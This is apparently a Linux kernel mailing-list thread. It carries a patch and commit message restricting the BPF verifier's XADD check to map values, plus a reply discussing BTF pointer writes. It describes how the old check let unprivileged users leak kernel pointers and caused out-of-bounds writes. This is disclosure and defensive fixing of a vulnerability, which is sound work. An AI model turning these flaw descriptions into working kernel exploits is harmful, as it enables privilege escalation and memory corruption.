reason, meaning that that part would have to be fixed differently? > > > > > > > > yeah. 'doesnt make sense' is relative. > > > > I prefer to fix the issues instead of disabling them. > > > > xadd to PTR_TO_STACK, PTR_TO_TP_BUFFER, PTR_TO_BTF_ID should all work > > > > because they are direct pointers to objects. > > > > > > PTR_TO_STACK and PTR_TO_TP_BUFFER I can sort of understand. But > > > PTR_TO_BTF_ID is always readonly, so XADD on PTR_TO_BTF_ID really > > > doesn't make any sense AFAICS. > > > > Not quite. See bpf_tcp_ca_btf_struct_access(). Few fields of one specific > > 'struct tcp_sock' are whitelisted for write. > > Oh... but that kind of thing is not really safe, right? While there > aren't really any pointers to struct tcp_sock in the kernel, I've > noticed that there are also some helpers that take ARG_PTR_TO_BTF_ID > arguments, which is kind of similar; and those look like it wouldn't > be hard for root to abuse them to corrupt kernel memory. E.g. > bpf_skb_output_proto is reachable from tracing programs, so I expect > that it'd be pretty easy to corrupt kernel memory with that. > > As far as I can tell, fundamentally, BPF must not write through BTF > pointers because the BPF verifier can't guarantee that BTF pointers > actually point to the type they're supposed to point to. In general case of tracing yes. There is no 100% guarantee that's why there is no write there. But in case of bpf-tcp-cc it's guaranteed to be a valid pointer. Or I'm missing your point.
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c index 38cfcf701eeb7..397c17a2e970f 100644 --- a/kernel/bpf/verifier.c +++ b/kernel/bpf/verifier.c @@ -2699,28 +2699,6 @@ static bool is_ctx_reg(struct bpf_verifier_env *env, int regno) return reg->type == PTR_TO_CTX; } -static bool is_sk_reg(struct bpf_verifier_env *env, int regno) -{ - const struct bpf_reg_state *reg = reg_state(env, regno); - - return type_is_sk_pointer(reg->type); -} - -static bool is_pkt_reg(struct bpf_verifier_env *env, int regno) -{ - const struct bpf_reg_state *reg = reg_state(env, regno); - - return type_is_pkt_pointer(reg->type); -} - -static bool is_flow_key_reg(struct bpf_verifier_env *env, int regno) -{ - const struct bpf_reg_state *reg = reg_state(env, regno); - - /* Separate to is_ctx_reg() since we still want to allow BPF_ST here. */ - return reg->type == PTR_TO_FLOW_KEYS; -} - static int check_pkt_ptr_alignment(struct bpf_verifier_env *env, const struct bpf_reg_state *reg, int off, int size, bool strict) @@ -3298,10 +3276,7 @@ static int check_xadd(struct bpf_verifier_env *env, int insn_idx, struct bpf_ins return -EACCES; } - if (is_ctx_reg(env, insn->dst_reg) || - is_pkt_reg(env, insn->dst_reg) || - is_flow_key_reg(env, insn->dst_reg) || - is_sk_reg(env, insn->dst_reg)) { + if (reg_state(env, insn->dst_reg)->type != PTR_TO_MAP_VALUE) { verbose(env, "BPF_XADD stores into R%d %s is not allowed\n", insn->dst_reg, reg_type_str[reg_state(env, insn->dst_reg)->type]);
At the moment, check_xadd() uses a blacklist to decide whether a given pointer type should be usable with the XADD instruction. Out of all the pointer types that check_mem_access() accepts, only four are currently let through by check_xadd(): PTR_TO_MAP_VALUE PTR_TO_CTX rejected PTR_TO_STACK PTR_TO_PACKET rejected PTR_TO_PACKET_META rejected PTR_TO_FLOW_KEYS rejected PTR_TO_SOCKET rejected PTR_TO_SOCK_COMMON rejected PTR_TO_TCP_SOCK rejected PTR_TO_XDP_SOCK rejected PTR_TO_TP_BUFFER PTR_TO_BTF_ID Looking at the currently permitted ones: - PTR_TO_MAP_VALUE: This makes sense and is the primary usecase for XADD. - PTR_TO_STACK: This doesn't make much sense, there is no concurrency on the BPF stack. It also causes confusion further down, because the first check_mem_access() won't check whether the stack slot being read from is STACK_SPILL and the second check_mem_access() assumes in check_stack_write() that the value being written is a normal scalar. This means that unprivileged users can leak kernel pointers. - PTR_TO_TP_BUFFER: This is a local output buffer without concurrency. - PTR_TO_BTF_ID: This is read-only, XADD can't work. When the verifier tries to verify XADD on such memory, the first check_ptr_to_btf_access() invocation gets confused by value_regno not being a valid array index and writes to out-of-bounds memory. Limit XADD to PTR_TO_MAP_VALUE, since everything else at least doesn't make sense, and is sometimes broken on top of that. Fixes: 17a5267067f3 ("bpf: verifier (add verifier core)") Signed-off-by: Jann Horn <jannh@google.com> --- I'm just sending this on the public list, since the worst-case impact for non-root users is leaking kernel pointers to userspace. In a context where you can reach BPF (no sandboxing), I don't think that kernel ASLR is very effective at the moment anyway. This breaks ten unit tests that assume that XADD is possible on the stack, and I'm not sure how all of them should be fixed up; I'd appreciate it if someone else could figure out how to fix them. I think some of them might be using XADD to cast pointers to numbers, or something like that? But I'm not sure. Or is XADD on the stack actually something you want to support for some reason, meaning that that part would have to be fixed differently? kernel/bpf/verifier.c | 27 +-------------------------- 1 file changed, 1 insertion(+), 26 deletions(-) base-commit: 87b0f983f66f23762921129fd35966eddc3f2dae